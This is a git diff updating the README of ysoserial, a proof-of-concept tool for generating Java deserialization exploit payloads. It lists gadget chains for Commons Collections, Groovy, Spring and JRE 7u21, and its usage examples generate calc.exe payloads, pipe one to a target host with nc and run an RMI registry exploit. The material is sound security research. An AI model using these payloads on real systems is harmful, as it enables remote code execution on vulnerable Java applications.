updated README

yolosec · Jan 27, 2016 · ed18a40 · ed18a40
1 parent 0e99a19
commit ed18a40
Showing 1 changed file with 13 additions and 9 deletions.
diff --git a/README.md b/README.md
@@ -7,7 +7,8 @@ A proof-of-concept tool for generating payloads that exploit unsafe Java object
 
 ## Description
 
-Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/) 
+Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/). 
+Updated to include a [JRE <= 1.7u21 gadget chain](https://gist.github.com/frohoff/24af7913611f8406eaf3).
 
 __ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java 
 libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of objects. 
@@ -28,20 +29,23 @@ are not responsible or liable for misuse of the software. Use responsibly.
 ## Usage
 
 ```shell
-$ java -jar ysoserial-0.0.1-all.jar
+$ java -jar ysoserial-0.0.3-all.jar
 Y SO SERIAL?
 Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
         Available payload types:
-                CommonsCollections1
-                CommonsCollections2
-                Groovy1
-                Spring1           
+                CommonsCollections1 [commons-collections:commons-collections:3.1]
+                CommonsCollections2 [org.apache.commons:commons-collections4:4.0]
+                CommonsCollections3 [commons-collections:commons-collections:3.1]
+                CommonsCollections4 [org.apache.commons:commons-collections4:4.0]
+                Groovy1 [org.codehaus.groovy:groovy:2.3.9]
+                Jdk7u21 []
+                Spring1 [org.springframework:spring-core:4.1.4.RELEASE, org.springframework:spring-beans:4.1.4.RELEASE]
 ```
 
 ## Examples
 
 ```shell
-$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
+$ java -jar ysoserial-0.0.3-all.jar CommonsCollections1 calc.exe | xxd
 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
@@ -50,10 +54,10 @@ $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
 0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
 0000570: 0078 7071 007e 003a                      .xpq.~.:
 
-$ java -jar ysoserial-0.0.1-all.jar Groovy1 calc.exe > groovypayload.bin
+$ java -jar ysoserial-0.0.3-all.jar Groovy1 calc.exe > groovypayload.bin
 $ nc 10.10.10.10 < groovypayload.bin
 
-$ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
+$ java -cp ysoserial-0.0.3-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
 ```
 
 ## Installation